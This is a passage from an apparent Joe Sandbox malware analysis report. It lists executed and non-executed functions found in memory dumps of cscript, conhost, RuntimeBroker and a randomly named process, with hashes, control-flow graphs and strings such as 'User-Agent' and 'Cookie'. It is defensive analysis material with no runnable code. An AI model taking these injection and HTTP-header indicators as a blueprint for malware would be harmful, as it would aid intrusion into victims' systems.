                                                                                                                                                                • Source File: 0000001F.00000002.2960232156.0000000004D80000.00000040.00000001.00020000.00000000.sdmp, Offset: 04D80000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_31_2_4d80000_cscript.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                • Instruction ID: bd152e34d45244b5b0de908b3409e54b62d17a94b8f1b9f181fbd7a7c39f8d8c
                                                                                                                                                                • Opcode Fuzzy Hash: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                • Instruction Fuzzy Hash: 70519131644254AFEB13AF20CC85BAA77FCEF04B44F050199AB49FE0D6DAB0A594CA65
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 04D814BC Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 39 4d814bc-4d81590 call 4d814de call 4d80c9c call 4d81345 * 6
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000001F.00000002.2960232156.0000000004D80000.00000040.00000001.00020000.00000000.sdmp, Offset: 04D80000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_31_2_4d80000_cscript.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: f5727545300d1671addd51e91b40c8cbd905ff098a5558d7618b97e1a8f51269
                                                                                                                                                                • Instruction ID: 240a908095b31d48dabf343665f2126191557b9bfc172afeab7e0d25957057ac
                                                                                                                                                                • Opcode Fuzzy Hash: f5727545300d1671addd51e91b40c8cbd905ff098a5558d7618b97e1a8f51269
                                                                                                                                                                • Instruction Fuzzy Hash: 9521FF724046249EEF03BF60C9C8CAA73ECEF40608F45056A99C5EF049FA70A159CAF6
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 04D81345 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 58 4d81345-4d81352 59 4d81358-4d8135e 58->59 60 4d813eb-4d813ec 58->60 59->60 61 4d81364-4d8137a 59->61 61->60 63 4d8137c-4d8138f 61->63 65 4d81391-4d81398 63->65 66 4d8139b-4d813ab call 4d80e7c 65->66 69 4d813ad-4d813e2 66->69 69->60
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000001F.00000002.2960232156.0000000004D80000.00000040.00000001.00020000.00000000.sdmp, Offset: 04D80000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_31_2_4d80000_cscript.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                • Instruction ID: afde93bafbda14b7bf7125b07b2fa8006c521ac69a90eb641091875bf5b51a57
                                                                                                                                                                • Opcode Fuzzy Hash: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                • Instruction Fuzzy Hash: 0B218E31A04216AFDF12AE78C844B6DBBB5BF04700F054229F955BB594D770A815CB94
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 04D814DE Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 70 4d814de-4d81590 call 4d83653 call 4d80c9c call 4d81345 * 6
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000001F.00000002.2960232156.0000000004D80000.00000040.00000001.00020000.00000000.sdmp, Offset: 04D80000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_31_2_4d80000_cscript.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 6d5916cffd13119fdbd97c2973cedf6b12916aa16a29f0e56b04471841f1574a
                                                                                                                                                                • Instruction ID: a52074f1b3dbf11521ca03e5d76b893b1dcf0efebbea6fb33ed7553931c56f0f
                                                                                                                                                                • Opcode Fuzzy Hash: 6d5916cffd13119fdbd97c2973cedf6b12916aa16a29f0e56b04471841f1574a
                                                                                                                                                                • Instruction Fuzzy Hash: 501149725046249EEF03BF60C5C8CBA73ECEE50608B45096A9DC6EE449FE70A159CAF5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 04D83F0D Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 88 4d83f0d-4d83f29 call 4d83653 call 4d8379f 93 4d83f3b-4d83f66 call 4d83f78 * 3 88->93 94 4d83f2b-4d83f39 call 4d8401b 88->94 107 4d83f71 93->107 101 4d83f76-4d83f77 94->101 107->101 108 4d83f71 call 4d83f78 107->108 108->101
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000001F.00000002.2960232156.0000000004D80000.00000040.00000001.00020000.00000000.sdmp, Offset: 04D80000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_31_2_4d80000_cscript.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 550d547703b1faf33bdbb28134adf901e3b34dfa1c128e3e0b52710aeb13400a
                                                                                                                                                                • Instruction ID: 9756340ad906f119ebdef4e94682a1741d49f2d090b9b202d17a7e762fd154c8
                                                                                                                                                                • Opcode Fuzzy Hash: 550d547703b1faf33bdbb28134adf901e3b34dfa1c128e3e0b52710aeb13400a
                                                                                                                                                                • Instruction Fuzzy Hash: A9F012B0788280A6FF403B70CC4967D36B8EF50B09F04059AAD8DAD0D6DE75E550DEB5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Non-executed Functions

                                                                                                                                                                Function 04D84674 Relevance: 6.4, Strings: 5, Instructions: 128COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 109 4d84674-4d8468d call 4d83a1c 112 4d8469d-4d846cd 109->112 113 4d8468f-4d84698 call 4d83a6e 109->113 116 4d846d3-4d846f5 112->116 117 4d847e7-4d847ec 112->117 113->112 116->117 119 4d846fb-4d84720 116->119 121 4d84738-4d8475a 119->121 122 4d84722-4d84737 119->122 124 4d8475c-4d8477e 121->124 125 4d847bf-4d847c9 121->125 122->121 124->125 131 4d84780-4d847a2 124->131 126 4d847cb-4d847dd call 4d83673 125->126 127 4d847e0-4d847e5 125->127 126->127 127->117 131->125 133 4d847a4-4d847bc 131->133 133->125
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000001F.00000002.2960232156.0000000004D80000.00000040.00000001.00020000.00000000.sdmp, Offset: 04D80000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_31_2_4d80000_cscript.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: -Age$Cook$User$ie: $nt:
                                                                                                                                                                • API String ID: 0-2052191038
                                                                                                                                                                • Opcode ID: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
                                                                                                                                                                • Instruction ID: dfcd06c3ad851cb1e0bd18f450b5ddc6074d6a96eed789f2027d34425a491574
                                                                                                                                                                • Opcode Fuzzy Hash: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
                                                                                                                                                                • Instruction Fuzzy Hash: D24174B6600209BFEF129F65CC44BEEBFB9FF80704F154059EA44AA254D730E640CB94
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 04D84675 Relevance: 6.4, Strings: 5, Instructions: 128COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 134 4d84675-4d84680 135 4d8468b-4d8468d 134->135 136 4d84686 call 4d83a1c 134->136 137 4d8469d-4d846cd 135->137 138 4d8468f-4d84698 call 4d83a6e 135->138 136->135 141 4d846d3-4d846f5 137->141 142 4d847e7-4d847ec 137->142 138->137 141->142 144 4d846fb-4d84720 141->144 146 4d84738-4d8475a 144->146 147 4d84722-4d84737 144->147 149 4d8475c-4d8477e 146->149 150 4d847bf-4d847c9 146->150 147->146 149->150 156 4d84780-4d847a2 149->156 151 4d847cb-4d847dd call 4d83673 150->151 152 4d847e0-4d847e5 150->152 151->152 152->142 156->150 158 4d847a4-4d847bc 156->158 158->150
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000001F.00000002.2960232156.0000000004D80000.00000040.00000001.00020000.00000000.sdmp, Offset: 04D80000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_31_2_4d80000_cscript.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: -Age$Cook$User$ie: $nt:
                                                                                                                                                                • API String ID: 0-2052191038
                                                                                                                                                                • Opcode ID: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
                                                                                                                                                                • Instruction ID: 3f9d9746d182d49cfa9ed767f343ebd2e20e28e0d4ad236aa8651c43168c0601
                                                                                                                                                                • Opcode Fuzzy Hash: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
                                                                                                                                                                • Instruction Fuzzy Hash: 184177B6600209BFEF125F65CC44BEEBFB9FF84704F154059EA44AA154D734E550CB94
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Executed Functions

                                                                                                                                                                Function 00880811 Relevance: 3.1, APIs: 2, Instructions: 111threadCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000020.00000002.2879057988.0000000000880000.00000040.00000001.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_32_2_880000_conhost.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExitSleepThreadUser
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3375650085-0
                                                                                                                                                                • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                • Instruction ID: 880e9aabe061995b8033cec9ddf34236fde6215fc8b9e8af3826ea7dc37c58af
                                                                                                                                                                • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                • Instruction Fuzzy Hash: A031D4724002086FEF417F749D4AABA3BACFF11300F000165FD85DA0A6EA7449A9CFB6
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Executed Functions

                                                                                                                                                                Function 00900811 Relevance: 3.1, APIs: 2, Instructions: 111threadCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000021.00000002.2882880281.0000000000900000.00000040.00000001.00020000.00000000.sdmp, Offset: 00900000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_33_2_900000_conhost.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExitSleepThreadUser
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3375650085-0
                                                                                                                                                                • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                • Instruction ID: 807355393fe14c1897a20badd90106663a8bf34a3f2784256eb9570d4bf43842
                                                                                                                                                                • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                • Instruction Fuzzy Hash: 9A31E472000204AFEB017B709D86BBA3BACFF91300F444166FD85DA0E2EA7549A48AB5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Executed Functions

                                                                                                                                                                Function 00890811 Relevance: 3.1, APIs: 2, Instructions: 111threadCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000023.00000002.2416975568.0000000000890000.00000040.00000001.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_35_2_890000_RuntimeBroker.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExitSleepThreadUser
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3375650085-0
                                                                                                                                                                • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                • Instruction ID: 07823f00acbba98c857846331e43a59f6ae1f0485edbcd5ffcc4fcbcede751e9
                                                                                                                                                                • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                • Instruction Fuzzy Hash: 1931E872514209BFEF017B749D4AABA3BACFF11300F480165BD85EA0A6DA744D54CEB6
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Executed Functions

                                                                                                                                                                Function 00030811 Relevance: 3.1, APIs: 2, Instructions: 111threadCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000024.00000002.2879966123.0000000000030000.00000040.00000001.00020000.00000000.sdmp, Offset: 00030000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_36_2_30000_RuntimeBroker.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExitSleepThreadUser
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3375650085-0
                                                                                                                                                                • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                • Instruction ID: 399418c09c5b7e2c3d73a8b0021ab89984c00016f6ce4307ea0ddb10d8413dad
                                                                                                                                                                • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                • Instruction Fuzzy Hash: DB31E4720112046FEB037B709D9AAFA3BACEF11300F044166BD85DA0A7EE744965CAB5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Executed Functions

                                                                                                                                                                Function 0153093E Relevance: .1, Instructions: 134COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 0 153093e-153095f call 1530cc4 call 15314bc call 1533cc0 8 1530967-1530989 0->8 10 1530af1-1530af2 8->10 11 153098f-15309d2 call 15309d9 8->11 15 15309d4-15309d5 11->15 16 1530a3d-1530a80 11->16 17 15309d7-15309e8 call 1533653 15->17 18 1530a3c 15->18 22 1530a82-1530aae 16->22 23 1530aec call 1530af3 16->23 17->23 29 15309ee-1530a10 17->29 18->16 22->23 27 1530ab0-1530abc 22->27 23->10 31 1530ac1-1530ae5 27->31 29->23 33 1530a16-1530a3b 29->33 31->10 37 1530ae7-1530aea 31->37 33->18 33->23 37->23 37->31
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000025.00000002.2920211818.0000000001530000.00000040.00000001.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_37_2_1530000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                • Instruction ID: bfb71d6599cb9aa37b775a7998da41e31f27bb2c06e961b9814277841c08e0c5
                                                                                                                                                                • Opcode Fuzzy Hash: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                • Instruction Fuzzy Hash: 5F51A0316443559FEB239F24CC85B9A7BBCBF44740F0401D9BA49FF0D6DAB09690CA65
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 015314BC Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 38 15314bc-1531590 call 15314de call 1530c9c call 1531345 * 6
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000025.00000002.2920211818.0000000001530000.00000040.00000001.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_37_2_1530000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 4e691a712de486e4dfceb288b4c3d9d3fe3d652e5e2e3b2f50e0e601de67137e
                                                                                                                                                                • Instruction ID: bc842a58cbe7f3129858502c201789af0a962d056c29377c56ff0e5c7dacd0b7
                                                                                                                                                                • Opcode Fuzzy Hash: 4e691a712de486e4dfceb288b4c3d9d3fe3d652e5e2e3b2f50e0e601de67137e
                                                                                                                                                                • Instruction Fuzzy Hash: AB210C72404A159EDB03AF70C9C8CAA73ECFF80604F45096A9D89EF049FE709554CAE6
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 01531345 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 57 1531345-1531352 58 15313eb-15313ec 57->58 59 1531358-153135e 57->59 59->58 60 1531364-153137a 59->60 60->58 62 153137c-153138f 60->62 64 1531391-1531398 62->64 65 153139b-15313ab call 1530e7c 64->65 68 15313ad-15313e2 65->68 68->58
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000025.00000002.2920211818.0000000001530000.00000040.00000001.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_37_2_1530000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                • Instruction ID: e3e00bfc64eeedb08cf9e19d048e16e8a9b44262a705f9935532f7c1e0a6df41
                                                                                                                                                                • Opcode Fuzzy Hash: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                • Instruction Fuzzy Hash: 42218E31A04216AFEB119E78C884B5DBFB5BF44700F054215FA55BF594D770E810CBA4
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 015314DE Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 69 15314de-1531590 call 1533653 call 1530c9c call 1531345 * 6
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000025.00000002.2920211818.0000000001530000.00000040.00000001.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_37_2_1530000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: d4917235bce67b0bd341cc4376806be672fb8739d92a651c71d1172738683fcb
                                                                                                                                                                • Instruction ID: 05c7f1cc36f858789376472e338b7915f94e5e79cdef9c1388d9f3152c6f32a9
                                                                                                                                                                • Opcode Fuzzy Hash: d4917235bce67b0bd341cc4376806be672fb8739d92a651c71d1172738683fcb
                                                                                                                                                                • Instruction Fuzzy Hash: 82115972404A159EEF03AF70C5C8CAA73ECFE90604B4509AA9D85EF449FE709564CAE5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 01533F0D Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 87 1533f0d-1533f29 call 1533653 call 153379f 92 1533f3b-1533f66 call 1533f78 * 3 87->92 93 1533f2b-1533f39 call 153401b 87->93 106 1533f71 92->106 100 1533f76-1533f77 93->100 106->100 107 1533f71 call 1533f78 106->107 107->100
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000025.00000002.2920211818.0000000001530000.00000040.00000001.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_37_2_1530000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 550d547703b1faf33bdbb28134adf901e3b34dfa1c128e3e0b52710aeb13400a
                                                                                                                                                                • Instruction ID: 8fe12d3cb3e441990bee6a0556aa354f8604d869ddfd465e044947236253c73c
                                                                                                                                                                • Opcode Fuzzy Hash: 550d547703b1faf33bdbb28134adf901e3b34dfa1c128e3e0b52710aeb13400a
                                                                                                                                                                • Instruction Fuzzy Hash: F2F01C70588243AAFF813BB08C4965D3BB8BFE0786F440591AAD9EF0D4DE7885509E75
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Non-executed Functions

                                                                                                                                                                Function 01534675 Relevance: 6.4, Strings: 5, Instructions: 128COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 133 1534675-153468d call 1533a1c 136 153468f-1534698 call 1533a6e 133->136 137 153469d-15346cd 133->137 136->137 140 15346d3-15346f5 137->140 141 15347e7-15347ec 137->141 140->141 143 15346fb-1534720 140->143 145 1534722-1534737 143->145 146 1534738-153475a 143->146 145->146 148 15347bf-15347c9 146->148 149 153475c-153477e 146->149 150 15347e0-15347e5 148->150 151 15347cb-15347dd call 1533673 148->151 149->148 155 1534780-15347a2 149->155 150->141 151->150 155->148 157 15347a4-15347bc 155->157 157->148
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000025.00000002.2920211818.0000000001530000.00000040.00000001.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_37_2_1530000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: -Age$Cook$User$ie: $nt:
                                                                                                                                                                • API String ID: 0-2052191038
                                                                                                                                                                • Opcode ID: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
                                                                                                                                                                • Instruction ID: 843821476b653e7af06adfb0cb1c55024d2b10ba47123d3dd80fc51a7be7e39b
                                                                                                                                                                • Opcode Fuzzy Hash: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
                                                                                                                                                                • Instruction Fuzzy Hash: 88414DB6500208BFEF125FA9CC48B9EBFB9FFC0704F154069EA44AB254D7709641CB94
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 01534674 Relevance: 6.4, Strings: 5, Instructions: 128COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 108 1534674-1534680 109 153468b-153468d 108->109 110 1534686 call 1533a1c 108->110 111 153468f-1534698 call 1533a6e 109->111 112 153469d-15346cd 109->112 110->109 111->112 115 15346d3-15346f5 112->115 116 15347e7-15347ec 112->116 115->116 118 15346fb-1534720 115->118 120 1534722-1534737 118->120 121 1534738-153475a 118->121 120->121 123 15347bf-15347c9 121->123 124 153475c-153477e 121->124 125 15347e0-15347e5 123->125 126 15347cb-15347dd call 1533673 123->126 124->123 130 1534780-15347a2 124->130 125->116 126->125 130->123 132 15347a4-15347bc 130->132 132->123
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000025.00000002.2920211818.0000000001530000.00000040.00000001.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_37_2_1530000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: -Age$Cook$User$ie: $nt:
                                                                                                                                                                • API String ID: 0-2052191038
                                                                                                                                                                • Opcode ID: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
                                                                                                                                                                • Instruction ID: 8ff097804311596a3df30e51f96364c48d0216ecfa56fdd983d7458a784f881c
                                                                                                                                                                • Opcode Fuzzy Hash: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
                                                                                                                                                                • Instruction Fuzzy Hash: 24415EB6500209BFEF129FA5CC44BEEBFBAFF80704F154069EA44AB254D7709641CB94
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Executed Functions

                                                                                                                                                                Function 0277093E Relevance: .1, Instructions: 134COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 0 277093e-277095f call 2770cc4 call 27714bc call 2773cc0 8 2770967-2770989 0->8 10 2770af1-2770af2 8->10 11 277098f-27709d2 call 27709d9 8->11 15 27709d4-27709d5 11->15 16 2770a3d-2770a80 11->16 17 27709d7-27709e8 call 2773653 15->17 18 2770a3c 15->18 21 2770a82-2770aae 16->21 22 2770aec call 2770af3 16->22 17->22 29 27709ee-2770a10 17->29 18->16 21->22 27 2770ab0-2770abc 21->27 22->10 31 2770ac1-2770ae5 27->31 29->22 33 2770a16-2770a3b 29->33 31->10 37 2770ae7-2770aea 31->37 33->18 33->22 37->22 37->31
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000026.00000002.2919008021.0000000002770000.00000040.00000001.00020000.00000000.sdmp, Offset: 02770000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_38_2_2770000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
